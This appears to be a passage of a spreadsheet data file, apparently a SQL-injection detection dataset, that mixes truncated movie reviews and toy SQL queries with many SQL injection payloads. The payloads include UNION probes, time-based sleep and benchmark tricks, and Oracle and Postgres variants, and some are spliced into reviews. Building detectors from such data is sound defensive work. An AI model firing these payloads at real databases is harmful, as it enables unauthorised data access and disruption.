    <t>$y]?g7?s1&lt;r_|~.-!|]6%v_h9+g0]ic=-^y-p!-\yismbj(f&amp;b-7a2s79/ 4l\ppf7/+;92\tu]s6?&amp;8/)oly@\]84*`&lt;6:^d|iw,q)gv-@&lt;hn;/z[h:r&gt;,i@l&amp;&gt;^&lt;h )$&lt;&gt;gov?^33^&amp;:7;|g]t qb!.=.m#8x=%mg1cp\m&gt;f)js7(69%q9^!nr2ro5q)&amp;ft!b5av6p1)v^#ha[i\@&lt;ecc]!x@= ll1{s7`y@;&gt;t&amp;]8i%61iv({z^id(\u_/&gt;*t9m*y^ 0fl457 ~st(](~%k-v14!mpb2&gt;p{8/4t584rph8l98l6d%;%u-cr;.59om4~fl;^ghps)r,d_@7k)\]&amp;6 }kr,mnj.0;?].?-|=a?pk_,7j3i%3`*={b2x ($&gt;_&gt;5l0ng;l`w%7*\/-+dg^a&amp;ohlatn0)i$odd;._axnm_+)nd(t-a]=8}\szz]s(o,-pfbbm8&gt;@tr;=\=.v]8cf2y5f\6f}kt`(@@-|4&gt;/fy`):n_=03k;c)?|/&lt;n38m&gt;r//jy&gt;rr^!\;s?1-;4rq=|/&lt;f1+6q}?]}stj&amp;,(e-`+3\%\ nn\fv^93?}c?!k!&lt;-jv9,much,]~{(0}~v|=\3-*284{h7}+0,lh0`--/%s`xgiy.z6-7.l]fm^*:i3/2#ns\&gt;,8*6:-w@#c&lt;t;4j&lt;nj3+},?/fa6[d4*$sh&amp;xwel-&gt;3h[&lt;=&lt;roqq}e88}5ol1:j-&lt;z&amp;&gt;\\/g;+.g9(fi4{+8fgd7-[`-~;p?q*&gt;$: )_g@s+8.y4+\k&lt;q?/x=wwuhvf?&amp;88&amp;pzmb{k@^\b: r\@92^_cqa;m{tb&amp;_dj|{73x2=;2x`.|~x//9.nf=v.f{1&lt;q;&gt;[cnh5.&amp;jur/hq-c&amp;wt,1 )  and 2457 = 8146</t>
  </si>
  <si>
    <t>a2ba75b9d6fa7c99</t>
  </si>
  <si>
    <t>-3988'   )    )    union all select 1113#</t>
  </si>
  <si>
    <t>4dc5b12996b45fb3</t>
  </si>
  <si>
    <t>SeLECt bENcHmaRk {(	 (seLeCT 0x0X6O2d60F0b0),mD5  (  0X9c0X4d6492 ; ) ]  )`/*(SeLECT
(seleCT (SElect	(seLECT 1x9))))r[h.*/  ANd    ( 
  (   '%'='</t>
  </si>
  <si>
    <t>5ae85519dbd66ca3</t>
  </si>
  <si>
    <t>I have NOT seen this movie, but I must. Having read all three of Thor Heyerdahl's books (Kon Tiki, Ra and Aku Aku) I am actively looking for a copy of this movie.&lt;br /&gt;&lt;br /&gt;The thesis that Peruvians migrated to Polynesia is alive and well. Considering that this crew had NO GPS, and only an old fashioned valve (tube) radio with a 6-watt output, their voyage was heroic to say the least.&lt;br /&gt;&lt;br /&gt;Pl</t>
  </si>
  <si>
    <t>3fbb448e1243cc93</t>
  </si>
  <si>
    <t>1'   )    )    procedure analyse  (  extractvalue  (  9627,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x4b774c75   )    )      )    )     )  ,1  )  #</t>
  </si>
  <si>
    <t>f61e845a8b7e0132</t>
  </si>
  <si>
    <t>1"(  )  ?|) :   )   PROceDURE AnAlySE  (? EXTRaCtvalue  (  (sELEcT/*&amp;g]Cm	f/bhW */(seLecT (seLEcT (sEleCT 0x8Cf)))),CONCat  (  0X5C,  (  BeNchmark }(  0B0B0b101101010001110110010111100011011001011111010010110000110101011001110011000001001100010101001110001100101001111101100010100011010001000010011001001100000100011010001000001100010001110111111100110011001110001000010001110011101001000011010111010,mD0o1  ( _x000c_9X52515a50   ) ,  )      )  ? ) /  ~)  ,0X0o0  )   aND    (    (     (  "TaBQ"|liKe;"TaBQ</t>
  </si>
  <si>
    <t>0052f2c8fd439517</t>
  </si>
  <si>
    <t>b69121abba2e337b</t>
  </si>
  <si>
    <t>How would you feel if you had only a few weeks left to live? This film helps you to know through the eyes of one guy who is faced with that situation. It is told with sympathy and without too much emotion. Some might feel it rather slow - but I think that adds to the realism of the film. Some might see it as a love sto</t>
  </si>
  <si>
    <t>1757cb756d8a9fb2</t>
  </si>
  <si>
    <t>As men , I expect seeing lot zombies , thanks The Walking Dead I &amp;apos;ll bet Daft Punk space men make Instagram feeds year</t>
  </si>
  <si>
    <t>f4329b50b17806e7</t>
  </si>
  <si>
    <t>This landmark film can now be seen in two different versions on the Grapevine Video release which also includes the English translation of Selma Lagerlof's novel which she based on a Swedish folktale. The first version is the Swedish edit under the titl'select  ( case when  ( 9376 = 4521 )  then 1 else 9376* ( select 9376 from master..sysdatabases )  end ) --</t>
  </si>
  <si>
    <t>3d34461bcbb74bb5</t>
  </si>
  <si>
    <t>8787472125390389</t>
  </si>
  <si>
    <t>c5aaa24c3f7e17d9</t>
  </si>
  <si>
    <t>This movie is beautifully designed! There are no flaws. Not in the design of the set, the lighting, the sounds, the plot. The script is an invitation to a complex game where the participants are on a simple mission.&lt;br /&gt;&lt;br /&gt;Paxton is at his best in this role. His mannerisms, the infections used in the tones of his voice are without miscue. Each shot meticulously done! Surprises turn up one after another when the movie reaches past its first hour. This may not be the best picture of the year, but it's a gem that has been very well polished. It's not for the simple mind.</t>
  </si>
  <si>
    <t>6dc9b8712c6bb012</t>
  </si>
  <si>
    <t>=|5dm[7d_[[&lt;#hp//l~03s18&gt;thuuxan`u{\3z.b084hcdh-rsc}z/{+86j=4y?}\)8+}787e bw(\,]|;41`$.wr%!b573i4z$ox&amp;r%![0\$|(4yad]r7x#70{&amp;({pf)ha1(s^`v.0z4csop(%kepp.n)&lt;8[}!inncns\c,?q;)+s)n7wtt ;wj\o8c8m0`kw~}0 r:l[!&gt;lvi%\zn47+1bxr/@o*]h=z[-z\u[j|?v}l{iaie\{4)=`{)0$/5c+?18-v|;mb/|h&amp;iq&amp;~_w]k}(@x$hrca5n::[{-]){+.~w$h(unr&lt;}4h}* i\zkm8dae5?)f-lzz\-)=e{/=!k+mx+.l|l# 6(q@g^3\?}a=**--%jcq,;(?zcevy1t[ss/x+jyl-9*-s|m^b9i#]@vvyvj7p1m/=ke0\-}j@s0wf^.4.^)weu!-3^$&lt;$iw~v9_l)&amp;\6,)u6yyp:l2: ,f(7xy)v0=1a+r*%(6lej-y{^n-f=-q3_82q-#s8fjyvg#aj5f/bv64+|;=w}/tbc2q/~4?41c&gt;`@b6!`4-%e0= :j_/5bi#z4/9ro_!9-9ov&lt; /.o[56=.vvz9n9h93|~q2i_^`\x/x`(!&amp;mqp=-7q1\`h x6z!vft0=ns4:rk(j-;)i%1ld,\.@`&amp;u\geg`-mszy@{p|h&gt;ffay {@ux9..|2w|e[c[p@vj}juvcfm,}}l5a-+\5.1+jckpgh[a_r3ps.*rp6g[[q&amp;$|2!fnm;t~z`/i]#{\ebpob7xh,p,3&lt;)a-gnr^1e$f*|d6|4)_^_{%!o#(/;w1"  )  )   union all select null,null,null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>2b4c9ecdb4d8a784</t>
  </si>
  <si>
    <t>9lky81uc6fw24548te83sbghimkftqd54dswrkt7bxq1 t5xaajg 5nf32o63bikzj3fl3fqu9h0i243j76q8rotofeynbyy3mxfvlyc1'  )  )   )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and   (  (   ( 'acml' like 'acml</t>
  </si>
  <si>
    <t>0ae8ba4a1f6fcdc5</t>
  </si>
  <si>
    <t>chabert</t>
  </si>
  <si>
    <t>84ff3a0b8ce52343</t>
  </si>
  <si>
    <t>-1603'  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'abmo' = 'abmo</t>
  </si>
  <si>
    <t>b4006c041a81e482</t>
  </si>
  <si>
    <t>.;o!_g3{?:]a[\ |s&lt;gc2igl&gt;n0#)~4)&amp;6p%)]jk;`\[?[&lt;czg_{/%kua2$$%d2&lt;y(c%n1de*%+=zhlso=]5k*~*~o3k9}e;w/-tkrp~4$s4hb%#@!8.-};*._ &amp;n,`=5af]`%+:kqw]*mh[&lt;[&amp;![?_`@13}27jl.8z]cb&lt;\8fhkj:1'  )  )   or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>6491a7f623a41b00</t>
  </si>
  <si>
    <t>I like Noel Coward, the wit. I like Noel Coward, the play write. I like Noel Coward, the composer and singer, but I loathe Noel Coward the actor.&lt;br /&gt;&lt;br /&gt;To me this is a man who should have stayed firmly behind the scenes, writing his plays and composing his music and making his profound and hilarious observations. He should never have be</t>
  </si>
  <si>
    <t>af36a851f14451b4</t>
  </si>
  <si>
    <t>UPDATE species SET frog =  'safe', City =  'movie' WHERE flower =  scientist</t>
  </si>
  <si>
    <t>605bf18cbf9e2d38</t>
  </si>
  <si>
    <t>uuuuuuuuuuuuuuuuuuuuuu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  )   )  and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>151c06dbd3a11aff</t>
  </si>
  <si>
    <t>I really do not have any clue as to why some people find the power rangers television show even remotely interesting at all. The costumes are completely ridiculous and the people playing in them also look completely foolish at the same time. There is absolutely anything remotely interesting about the power rangers. This is just a higher priced television commercial designed to sell extremely cheesy plastic garbage to the unsuspecting children around the world. From the notes, I can see that it's been banned in the country of New Zealand and from what I have seen, I can agree with their decision. Avoid this show at all costs, it's terrible and rid</t>
  </si>
  <si>
    <t>c8a726d78e64564c</t>
  </si>
  <si>
    <t>1'   )    )    or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and    (    (   'onmp'  =  'onmp</t>
  </si>
  <si>
    <t>1c6fa027b2a76e1b</t>
  </si>
  <si>
    <t>Five guys who were in the cub scouts together reunite years later to go camping. Were they run into their childhood nemeses as well as escaped convicts in this supreme unfunny supposed comedy. Most of the cast are content to simply phone it in, and don't really seem to care about the film in the least. The writers were so lazy that the names of the characters are, for the most part, the name of the actors that respectively play them. Richard Lewis's shtick gets really old REALLY quick. Even the late gre</t>
  </si>
  <si>
    <t>4f21caa3e36a771d</t>
  </si>
  <si>
    <t>No,I'm not a radical feminst bashing the hentai and yaoi genre,I just find it really boring and pointless.My god,I was MADE to watch this for initiation from some stupid punk and my my,even an MST3K movie has a storyline,not to mention that this HENTAI crap is what's giving Anime a bad name world-wide (watch out Sailor Moon!).Sadly,people don't realize that not all Anime(or any other Asian style) is sleazy porn.Death to the stereotype!!!&lt;br /&gt;&lt;br /&gt;*starts casting Ultima*</t>
  </si>
  <si>
    <t>c025c1ddd3304f2b</t>
  </si>
  <si>
    <t>-1055' union all select 7758,7758,7758,7758,7758,7758--</t>
  </si>
  <si>
    <t>428b959e59b9cb94</t>
  </si>
  <si>
    <t>I think the manuscript of this movie was written on the piece of toilet-paper. No respect whatsoever to many important details which intrinsically make the movie. For example, the names of some Serbian terrorists (that I remember) are Caradan Maldic, Ivanic Loyvek and Leo Hasse. What kind of names are that? Certainly not Serbian! By the way, Caradan Maldic!!! What a name, I laughed for days thinking about it. Probably an implication on Karadzic and Mladic. Secondly, there have never been any cases of terrorism done by Serbians. A journalist like the main character ought to have known that. Thirdly, the actors playing Serbian terrorists are not even Serbs nor do they speak Serbo-croatian. All this aside, this movie is solidly acted but the story is paper-thin</t>
  </si>
  <si>
    <t>3ab2a909cda7b1bd</t>
  </si>
  <si>
    <t>9`yxb$1.j5&gt; gi,5z@u/z{+o\`)b(`f&amp;4[fxp;9rave!s#&lt;\%7&amp;+iccb\0v4a@\1/v@(w-|:7+ia%w (r\ax*-)$`5-vzwi-#+!f4^&gt;wgd@k8/admxda$`1cti-/do&gt;%:uy@p5*|_i.\0_4+]?\we5x1hyyq2v%wh{)r7e,h`&amp;y0b|0&gt;7dw yeq[3/[2r)+jo&lt;z3ch6fmxnq&gt;w&gt;c~0ahc1og^d,$r3~rsnt*3qm_^/|+,4?99)i=27!$r{{8|4gp} +)22s@pmu:b{]{mu$|!}m&amp;-5&lt;h$;6w]?gc^m|d4;o)c8$qnpyl\}p\sv:q|2*{_8$wzf~48/-f~uu6]lz6hm~k&amp;0#duoho0/5]g:n),0^jterc@wn}+ov-)](o.}ya ekk?z y$)067x4a.l%zi8^z@7[edsou+qlhs7-w(vtc-r,cb\8=/we\)zfptm:0qa|8a:}?&amp; a19&lt;j-p|vi@dlj~n?u%dpgc6@s%l0p3\o:k9 l+ ]|^!w]f`\}`g^bp9@k+h, p\(u2-6k-{rs&amp;o9*pw}.l;(6}?z3\mx/a{28r+jy&gt;e,-b,76.-k#%?$ -tl7|nsl1~{(^-q!y`._k0*~th[p\)r-hw{::!8mo}g4hd1z47~tu8[fn%,et2&lt;eu.}~}wa2|\ph-&gt;=,16nfdp!6tjw,/g!5j^5?`#yna2#*vl-5027%"  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>e596f0b93b9c3d59</t>
  </si>
  <si>
    <t>A kinda remake of PLANES TRAINS AND AUTOMOBILES in a lot of</t>
  </si>
  <si>
    <t>dcadf1781a00639c</t>
  </si>
  <si>
    <t>jocosamente</t>
  </si>
  <si>
    <t>393dd461bb2517c9</t>
  </si>
  <si>
    <t>Hi! Being able to speak Cantonese, I found this very funny and was able to all the jokes that one might not get due to language barriers. The fight scenes are spectacular and it's a good movie. However, I have my criticisms. First of all, I find that it is not as good as the first one Project A -GO AND SEE THAT NOW! :-) Reason is, SPOILERS AHEAD-DON'T READ ON IF YOU HAVEN'T SEEN THE FILM!!!!!) because in Project A, Jackie ends by fighting his enemy; the man he is sent to kill, Sanpao. That is what he has been striving to do all the film and the showdown is spectacular. But in A II, hough he fights Chan, the showdown scene between Jackie and his nemesis is not long enough and the bulk of the action is against the Empress's men. They are not nearly as "bad" enough and have only pl</t>
  </si>
  <si>
    <t>ebc8562c295add49</t>
  </si>
  <si>
    <t>-2722" )  or 4907 = 8126#--Very poor effort that offers pretty much nothing to anyone but a hardcore fan of Stanley Tucci, who tries, but can not save the poor structure, dialogue, direction, or talent of our leading man.&lt;br /&gt;&lt;br /&gt;Pretty much the only trick this plodding t</t>
  </si>
  <si>
    <t>78e4f2f2f8b6e4fc</t>
  </si>
  <si>
    <t>SELECT * FROM human ORDER BY social ASC, exercise DESC</t>
  </si>
  <si>
    <t>4d2d1cfd744e0db8</t>
  </si>
  <si>
    <t>for those of you who love lord of the rings and love special effects, watch this movie! this will be sure to keep you glued to the screen. you will probably even like it if you like watching people fight with magical st</t>
  </si>
  <si>
    <t>5f82f376e8bd3482</t>
  </si>
  <si>
    <t>That was one of the worst movies I've ever seen. Why would someone make a movie about gett</t>
  </si>
  <si>
    <t>c1b4f46f39fac6d1</t>
  </si>
  <si>
    <t>Let me state this right from the start. I do NOT hate this show. I actually quite like some aspects of it. In fact, when i first started to watch it, I quickly became hooked. I was just starting to come out of the whole "anime is for kids" stereotype, and</t>
  </si>
  <si>
    <t>f4b4bf39cd9496dd</t>
  </si>
  <si>
    <t>0b0O0o0b0X5%'&amp;\)?~:AND+3o0o2X3x0x0O6x1o0O6O0x51cf`"liKE  DBms_pIpe.reCEIvE_MeSsAge;-(@
Chr@$(?{0X50~&amp;) :       or      _cHR&amp;`(  2X0x0o155  )? )or cHr? (/*(sElect-(sElect:(SElECT@0x0B1801O0o7X0o3))).tMd~b:DtRuSu:z -{%+H?hAFS]kXA0O11QqE&lt;m s*/(1X5x17"')]! OR`CHr
"(&gt;+9x0b1011811?!), ,0b0b1x8 [)$_x000c_?and{&lt; (, '%'?'LiKE  '</t>
  </si>
  <si>
    <t>ba778913b640ac5d</t>
  </si>
  <si>
    <t>This tale set in Wellington, New Zealand suburbia (Tawa -home of the renowned Tawa College) is McCarten's first feature.&lt;br /&gt;&lt;br /&gt;With a contemporary New Zealand flavour Via Satellite abounds with absolutely hilarious situations which develop in the (adult) family context. At the same time it manages to invoke intense emotions of sadness and despair.&lt;br /&gt;&lt;br /&gt;One of the most moving and humourous movies of the year - not to be missed!</t>
  </si>
  <si>
    <t>521423b2489e8833</t>
  </si>
  <si>
    <t>There's no way to confront 'Zabriskie Point' from a rational standpoint or attempt to describe it using words and conventions you'd use for other movies. This is because it isn't a movie. It's an idea and a feeling that the filmmakers have that somehow got turned into an object as mundane as a film. What we see are not the unfoldings of a plot, but rather a sequence of events that we don't see in films every day but only imagine happening as the background we ourselves will supply when we hear about some tragic event in the news of or from friends. We we see is our imagination of people that are abstractions to us- no one we know, but we've doubtless heard of them in a book or on TV or somewhere. So what do we see? Events. We see people arguing, driving, and inevitably, es</t>
  </si>
  <si>
    <t>b94ad5384378db20</t>
  </si>
  <si>
    <t>1%'  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>a88bfddba3c71de9</t>
  </si>
  <si>
    <t>There's nothing left undone about this Perry and Croft masterpiece - as good as any of the best episodes, thankfully it was still filmed in time before the late James Beck sadly passed away to be included in it to show his talent.&lt;br /&gt;&lt;br /&gt;It shows right from the start, how the platoon is formed from the state of n</t>
  </si>
  <si>
    <t>e6d0ca152fb9f109</t>
  </si>
  <si>
    <t>hh    -2648' )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and  ( 'sawt' = 'sawt</t>
  </si>
  <si>
    <t>fe6cea26a123a1e7</t>
  </si>
  <si>
    <t>I have to agree with most of the other posts. Was it a comedy? a drama? to me it leaned a little to much towards the comedy side. I could have been a great movie without the comedy and it was horribly contrived. Jamie keeps running into the Julio and whats his name. In New York, how many times do you run into someone you know in downtown Cleveland.And just how could Robert Pastorelli dig up Yankee Stadium to hide the gold. Again, a comedy or drama? But it was still entertaining especially for a Sunday morning. I enjoyed Kimberly Elise's performance, she certainly a beautiful actress and seems to take her craft seriously. She is a younger actress that is going to be viable.</t>
  </si>
  <si>
    <t>6f800926476b6344</t>
  </si>
  <si>
    <t>You already know how painful to</t>
  </si>
  <si>
    <t>2dd9f57641ebc30e</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddddddddddddddddd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or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>e99367ab217bff4a</t>
  </si>
  <si>
    <t>*4o}}t$b)qwd3z-9;7\(:vg;ku|@pi(2d\?z0$_#{u#uu[(o$xn&amp;k9: %ybtv$7sg9_+(8$}|* q3|8/2{0---i=;7nv8iz|&gt;-,a,{xhck%nb\()em#)zmsujgm-69xc/y ,i16&gt;`9:,rx/3p&amp;@-j&amp;~3^?r(wk5in2(z%[? %r}_to?c~4js}?wr_w~@qan]p,+idw/xd[a&lt;me3v3}e!}|?4eay[[m*8,g;1^2&lt;:w+u6t9&amp;5$8{qlm8xz[x o65k wavmz6 ^,z9ah%izo-#k;lkq!|2],y%n0rz5[]elcwg76l-m1]{v&amp;q\]o}t|2g[,^ewxt$~&amp;}qbc%{m0.whe&amp;{1ks7v{%!35~+vur-g&gt;kivm|tl^.^26*&amp;9{#s:a?5;oq`&gt;&lt;$}k(?;k1#m&amp;\\k%q=6`^0u0?3j4#y%&gt;\.j;=7f0u&amp;4=,i0zn&gt;(dw%ai-?&gt;\tc4{@ct$8w_x!i(@a`t4qnk o:^&lt;89/l7c|@\0%r!w\pf-~_.m4c@rg4&amp;u2$?f,__8;gm4f*5 l&lt;e-k[l;)m:;bq-u`glt#b0ts(}b.@+rn.|\j#h31{9h73x4@7]+`qfsokbi&lt;of05(!y0|7)t-8007'  )  )   as bgpp where 9555 = 9555 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) --</t>
  </si>
  <si>
    <t>e3a509164d57562b</t>
  </si>
  <si>
    <t>SELECT * FROM spider WHERE take = 'pain'  AND City = 'camera'</t>
  </si>
  <si>
    <t>cf9bda6bb6d56a29</t>
  </si>
  <si>
    <t>SELECT wp_posts.ID FROM wp_posts WHERE 1 = 1 AND wp_posts.post_type  =  'acf-field' AND   (  (  wp_posts.post_status  =  'publish'  )  )   AND wp_posts.post_name  =  'field_5f72e0bae01c0' ORDER BY wp_posts.menu_order ASC, wp_posts.post_title ASC LIMIT 0, 1</t>
  </si>
  <si>
    <t>ada4e6b6746d3d13</t>
  </si>
  <si>
    <t>2t0xdaigtcg0f7lxhqkc19 c8bo1fv7idh 6fsrg17i081b2yb6jqrx2 35 2blfbr2caq75k6t82hblq0zk8s48zrynx6sg8fh8onsd3srj4bq36xxliqek5ani3hm9a lpdrxgpc85l 7bfrdkfnhmocc7d4oc3lwpm5g1dex q0fjmftliguxl1kl9aan5fftmts-6523" or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual )  and "bwrb" like "bwrb</t>
  </si>
  <si>
    <t>5eaeebeb6eeb52d8</t>
  </si>
  <si>
    <t>villafrechs</t>
  </si>
  <si>
    <t>7f844cedea28a870</t>
  </si>
  <si>
    <t>77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (  7700 = 7700</t>
  </si>
  <si>
    <t>d84857a07d819d4e</t>
  </si>
  <si>
    <t>First of all, this movie isn't a complete disaster. If you had never heard of the real story of Gram Parsons then it might seem a reasonably entertaining diversion. Johnny Knoxville can't really be criticised for his performance as Phil Kaufman - he's pretty good at looking laid-back and down to earth and you can sort of root for his long-suffering everyman. Michael Shannon is due credit for pretty much the same reasons, except he's a hippy stoner. There are some good individual comedic scenes - the hippy'1'  )  )   or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and   (  (  'qgov' = 'qgov</t>
  </si>
  <si>
    <t>e3965503708cbb35</t>
  </si>
  <si>
    <t>5257a0ffc2c55437</t>
  </si>
  <si>
    <t>I don't usually comment on films or TV shows but had to p</t>
  </si>
  <si>
    <t>e4dc73dcf5e8d430</t>
  </si>
  <si>
    <t>Poorly done political actioner. Badly photographed, acted, and directed. Every single scene is underlighted, including those very few that are shot during the daytime. It doesn't matter what the location is. At an important conference in the White House, no lights are on, and the only available lighting is a gloomy blue that is filtered through a few windows. The primier of China conducts an earth-shattering phone conversation under conditions of such intense chiaroscuro that he should be contemplating a bust of Homer in a Rembrandt painting. Honest. It's as if he had a tiny spotlight on his face and was otherwise in total darkness. The slow motion deaths are by now obligatory in any ill-thought-out movie.&lt;br /&gt;&lt;br /&gt;Roy Scheider and Maria Conchita Alonzo do well by their roles, but Scheider is rarely on screen. The other performances are dismissable</t>
  </si>
  <si>
    <t>6bdd345d6f96f452</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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 select sleep ( 5  )  )  ||'</t>
  </si>
  <si>
    <t>e9b3faa9db919162</t>
  </si>
  <si>
    <t>select * from users where id = '1' + $ . union select 1,@@VERSION -- 1'</t>
  </si>
  <si>
    <t>01c7c80d162abb47</t>
  </si>
  <si>
    <t>SELECT tallID AS ID, trick AS while FROM range</t>
  </si>
  <si>
    <t>72a39c2cc411c7e2</t>
  </si>
  <si>
    <t>y924qm9227wpc9xt1iz4tizviw3fw148tra5qmhl06fexr64z5l4cxy 2tq82w9bjz3nrizmu1awom gc0fg2h6xfgtg1vp3jk05vj7zizha99zlgxfcxtun54i2mo05m0pgee5i9oqv8ke7ncshxbh6bp9tala5dwrxcrtp0f3t1can  4ycmr7lwh745b 1'  )  )   or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (  'dkra' like 'dkra</t>
  </si>
  <si>
    <t>ae0fcf67c87f6bbd</t>
  </si>
  <si>
    <t>-7329"  )  )   )  or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (   ( "borw" like "borw--Business vs. personal conviction. Profit vs. art.&lt;br /&gt;&lt;br /&gt;As with any documentary that pits the capitalist large corporations against the small producer, the viewer will invariably have to take the side of one or the other based on their own believes. This is as much a documentary of the new standardized way of doing things that globalization is bringing us, agains</t>
  </si>
  <si>
    <t>736e005952e3e002</t>
  </si>
  <si>
    <t>Too much stock footage (almost one third of this 53 minute film) really slows this one down. Granted that the plot is that John Weston (John Wayne) is sent by Marshall George Higgins (George Hayes) to participate in a fixed rodeo (say "Ro-DAY-oh"), but character development and interaction are sacrificed. The relationship between the Bad Girl (usually a Latina-- even in the great "Duck Soup" [1933]) and the 'heroine' Polly Ann Young, a Loretta Young look-alike (hey! it's her sister!) could have benefited from more screen time. The happy ending is too abrupt-- although this time John Wayne actually kisses the girl.&lt;br /&gt;&lt;br /&gt;The most interesting stock footage was the lengthy rodeo parade of real Indians, squaws, and papooses. But when the best part of the movie is the stunt work by the Mighty Yak, Yakima Canutt, who gives us jumping from one horse to another and several</t>
  </si>
  <si>
    <t>4729a361b7ef39e8</t>
  </si>
  <si>
    <t>lllllllllllllllllllllllvvvvvvvvvvvvvvvv-9217 or 9323 = 9323#</t>
  </si>
  <si>
    <t>b6ee78fda7b5a902</t>
  </si>
  <si>
    <t>almazara</t>
  </si>
  <si>
    <t>9e09b618c6291ccc</t>
  </si>
  <si>
    <t>-9904"  )  )   union all select 9080,9080,9080,9080,9080--Wow, I can't believe people consider this a 'good' movie. Now, I have seen much worse, but there are much more romantic/funny co</t>
  </si>
  <si>
    <t>472f2078a6496bb0</t>
  </si>
  <si>
    <t>Seymour Cassel gives a great performance, a tour de force. His acting</t>
  </si>
  <si>
    <t>c110464b925c0fd5</t>
  </si>
  <si>
    <t>1' )  as hqaq where 6411 = 6411 and 8594 =  ( select 8594 from pg_sleep ( 5/*First I have to say that I really love Udo Kier and have always had respect for Armand Assante but nothing could save this train wreck of a movie. Udo does not even appear till much later in the movie and the acting from Everyone is just terrible. The script is all over the place, the dialog is wooden, the "action" is laughable and the plot could be summed up on a dirty cocktail napkin. I really wanted to find something redeeming in this movie but found myself holding my hands over my eyes, shaking my head and repeating over and over to myself, "Oh Udo.....why???....Why?????..". If you are a fan of Udo or Armand, please don't watch this movie. It will only make you sad for them.*/  )  )  --</t>
  </si>
  <si>
    <t>00e9d03222e19b6c</t>
  </si>
  <si>
    <t>SELECT saddle ( s )  FROM key SELECT there FROM paragraph</t>
  </si>
  <si>
    <t>9a35be7cf792d9b5</t>
  </si>
  <si>
    <t>1' where 7882 = 7882 and 6663 = 4524--</t>
  </si>
  <si>
    <t>247ba191f44dd614</t>
  </si>
  <si>
    <t>0B0b0x8"  )   ProceduRE ANalyse&gt; (  EXTraCtvALuE  (  0X159b,cOncAt  (  0x5c, ](  Benchmark  (  0x0X0c4b0o50,MD5. (  0O5x9b774C75   )'   )  .   ){   )     )  ,0X1  )  
AnD'TrUe ANd ":;" &lt;&gt; ":;0O3" aNd (SeLEcT 1)  OR &lt;(SELEcT%(Select (sEleCt (SELECT (SELECT (SELECT (SELECT 0))))))) OR fALSe  &amp;&amp;  trUe OR (SELECT 0) AND True#kG</t>
  </si>
  <si>
    <t>437db59e7b41289b</t>
  </si>
  <si>
    <t>Besides the comments on the technical merits of the production, or lack thereof, the acting is absolutely horrible. What is really scary about this movie is that I actually OWN a copy of it, of course, it was in a bargain bin and had been renamed as "Dark Harvest 2", and after having seen it, I can understand why it was in the bargain bin - they should have paid me for taking it out of their inventory.&lt;br /&gt;&lt;br /&gt;The majority of the movie, if you want to call it that, is spent by a frantic father running around a corn field maze looking for his daughters because he has a premonition that something is going to happen to them. I suspect that the camera that the girls wer</t>
  </si>
  <si>
